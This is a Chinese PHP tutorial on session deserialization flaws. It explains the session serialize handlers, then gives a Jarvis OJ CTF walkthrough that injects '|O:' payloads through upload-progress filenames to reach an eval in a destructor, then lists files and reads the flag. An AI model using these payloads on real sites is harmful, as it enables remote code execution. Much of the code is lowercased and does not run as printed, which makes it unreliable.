本篇文章给大家带来了关于php的相关知识,其中主要介绍了关于session反序列化漏洞的相关问题,就是序列化存储session数据与反序列化读取session数据的方式不同导致session反序列化漏洞,希望对大家有帮助。
推荐学习:《php视频教程》
php session反序列化漏洞php session反序列化漏洞,就是当【序列化存储session数据】与【反序列化读取session数据】的方式不同导致session反序列化漏洞的产生
什么是session官方session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点:
session保存的位置是在服务器端session通常是要配合cookie使用因为http的无状态性,服务端产生了session来标识当前的用户状态
本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**
php session工作流程以php为例,理解session的原理
php脚本使用 session_start()时开启session会话,会自动检测phpsessid 如果cookie中存在,获取phpsessid如果cookie中不存在,创建一个phpsessid,并通过响应头以cookie形式保存到浏览器初始化超全局变量$_session为一个空数组php通过phpsessid去指定位置(phpsessid文件存储位置)匹配对应的文件存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_session中不存在该文件: session_start()创建一个phpsessid命名文件程序执行结束,将$_session中保存的所有数据序列化存储到phpsessid对应的文件中具体原理图:
php.ini session配置php.ini里面有较重要的session配置项
session.save_path=/tmp --设置session文件的存储位置session.save_handler=files --设定用户自定义存储函数,如果想使用php内置session存储机制之外的可以使用这个函数session.auto_start= 0 --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php session.upload_progress.enabled= on --启用上传进度跟踪,并填充$ _session变量,默认启用session.upload_progress.cleanup= on --读取所有post数据(即完成上传)后立即清理进度信息,默认启用
php session序列化机制根据php.ini中的配置项,我们研究将$_session中保存的所有数据序列化存储到phpsessid对应的文件中,使用的三种不同的处理格式,即session.serialize_handler定义的三种引擎:
处理器对应的存储格式
php 键名 + 竖线 + 经过 serialize() 函数反序列处理的值
php_binary 键名的长度对应的 ascii 字符 + 键名 + 经过 serialize() 函数反序列处理的值
php_serialize (php>=5.5.4) 经过 serialize() 函数反序列处理的数组
php处理器首先来看看默认session.serialize_handler = php时候的序列化结果,代码如下
<?php//ini_set('session.serialize_handler','php');session_start();$_session['name'] = $_get['name'];echo $_session['name'];?>
为了方便查看,将session存储目录设置为session.save_path = /www/php_session ,phpsessid文件如下
1、文件名
文件名为sess_mpnnbont606f50eb178na451od,其中mpnnbont606f50eb178na451od就是后续请求头中cookie携带的phpsessid的值 (如上图浏览器中已存储)
2、文件内容
php处理器存储格式
键名竖线经过 serialize() 函数反序列处理的值
$_session[‘name’]的键名:name | s:6:“harden”;
php_binary处理器使用php_binary处理器,即session.serialize_handler = php_binary
<?phpini_set('session.serialize_handler','php_binary');session_start();# 为了方便acsii显示,将键名设置为36个字符长度$_session['namenamenamenamenamenamenamenamename'] = $_get['name'];echo $_session['namenamenamenamenamenamenamenamename'];?>
由于三种方式phpsessid文件名都是一样的,这里只需要查看文件内容
键名的长度对应的 ascii 字符键名经过 serialize() 函数反序列处理的值.
$ namenamenamenamenamenamenamenamename s:6:“harden”;
php_serialize 处理器使用php_binary处理器,即session.serialize_handler = php_serialize
<?phpini_set('session.serialize_handler','php_serialize');session_start();$_session['name'] = $_get['name'];echo $_session['name'];?>
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:name;s:6:harden;}
session的反序列化漏洞利用session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因首先创建session.php,使用php_serialize处理器来存储session数据
<?phpini_set('session.serialize_handler','php_serialize');session_start();$_session['session'] = $_get['session'];echo $_session['session'];?>
test.php,使用默认php处理器来存储session数据
<?phpsession_start();class f4ke{ public $name; function __wakeup(){ echo "who are you?"; } function __destruct(){ eval($this->name); }}$str = new f4ke();?>
接着,我们构建url进行访问session.php:
http://www.session-serialize.com/session.php?session=|o:4:f4ke:1:{s:4:name;s:10:phpinfo();;}
打开phpsessid文件可看到序列化存储的内容
a:1:{s:7:session;s:45:|o:4:f4ke:1:{s:4:name;s:10:phpinfo();;}
漏洞分析:
在session.php程序执行,我们将|o:4:f4ke:1:{s:4:name;s:10:phpinfo();;}通过php_serialize处理器序列化保存成phpsessid文件;
由于浏览器中保存的phpsessid文件名不变,当我们访问test.php,session_start();找到phpsessid文件并使用php处理器反序列化文件内容,识别格式即
键名竖线经过 serialize() 函数反序列处理的值
a:1:{s:7:“session”;s:45: | o:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;}
php处理器会以|作为分隔符,将o:4:f4ke:1:{s:4:name;s:10:phpinfo();;}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:
$_session['session'] = new f4ke();$_session['session']->name = 'phpinfo();';
我们访问test.php,即可直接执行phpinfo()函数
ctf例题:phpinfo<?php//a webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class oowoo{ public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); }}if(isset($_get['phpinfo'])){ $m = new oowoo();}else{ highlight_string(file_get_contents('index.php'));}?>
我们可以看到ini_set('session.serialize_handler', 'php'),判断可能存在session反序列化漏洞,根据代码逻辑,访问url加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置
可见php.ini中session.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):phpmaster value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_session变量中增加我们可控的输入点
补充知识
当检测session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,post一个与php.ini中设置的session.upload_progress.name同名变量php_session_upload_progress,如下图,即可写入$_session,进一步序列化写入session文件
下面是官方给出的一个文件上传时监测进度例子:
<form action="upload.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?> value=123 /> <input type="file" name="file1" /> <input type="file" name="file2" /> <input type="submit" /></form>
其中name=也可以设置为name=php_session_upload_progress
在session中存储的上传进度,如下所示:
<?php$_session["upload_progress_123"] = array( "start_time" => 1234567890, // the request time 请求时间 content_length => 57343257, // post content length 长度 bytes_processed => 453489, // amount of bytes received and processed 已接收字节 done => false, // true when the post handler has finished, successfully or not 是否上传完成 files => array(//上传的文件 0 => array( field_name => file1, // name of the <input/> field input中设定的变量名 // the following 3 elements equals those in $_files name => foo.avi, //文件名 tmp_name => /tmp/phpxxxxxx, error => 0, done => true, // true when the post handler has finished handling this file start_time => 1234567890, // when this file has started to be processed bytes_processed => 57343250, // amount of bytes received and processed for this file ), // an other file, not finished uploading, in the same request 1 => array( field_name => file2, name => bar.avi, tmp_name => null, error => 0, done => false, start_time => 1234567899, bytes_processed => 54554, ), ));
其中,session中的field_name和name都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置
session.upload_progress.enabled = on --表明允许上传进度跟踪,并填充$ _session变量session.upload_progress.cleanup = off --表明所有post数据(即完成上传)后,不清理进度信息($ _session变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件
构造post表单提交上传文件
<form action="http://web.jarvisoj.com:32784/index.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="php_session_upload_progress" value="123" /> <input type="file" name="file" /> <input type="submit" /></form>
构造序列化字符串作为payload(利用代码)
<?phpclass oowoo{ public $mdzz='print_r(scandir(dirname(__file__)));';}$obj = new oowoo();echo serialize($obj);?>//o:5:oowoo:1:{s:4:mdzz;s:36:print_r(scandir(dirname(__file__)));;}
为了防止被转义,我们在payload中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包
并修改filename值为
|o:5:\oowoo\:1:{s:4:\mdzz\;s:36:\print_r(scandir(dirname(__file__)));\;}
发送请求包,代码执行过程分析:
因此直接执行print_r(scandir(dirname(__file__)));并返回
phpinfo查看当前目录,/opt/lampp/htdocs/
构造最终payload读取here_1s_7he_fl4g_but_you_cannot_see.php文件内容,即flag
|o:5:\oowoo\:1:{s:4:\mdzz\;s:88:\print_r(file_get_contents(\/opt/lampp/htdocs/here_1s_7he_fl4g_but_you_cannot_see.php\));\;}
推荐学习:《php视频教程》
以上就是详细介绍php的session反序列化漏洞的详细内容。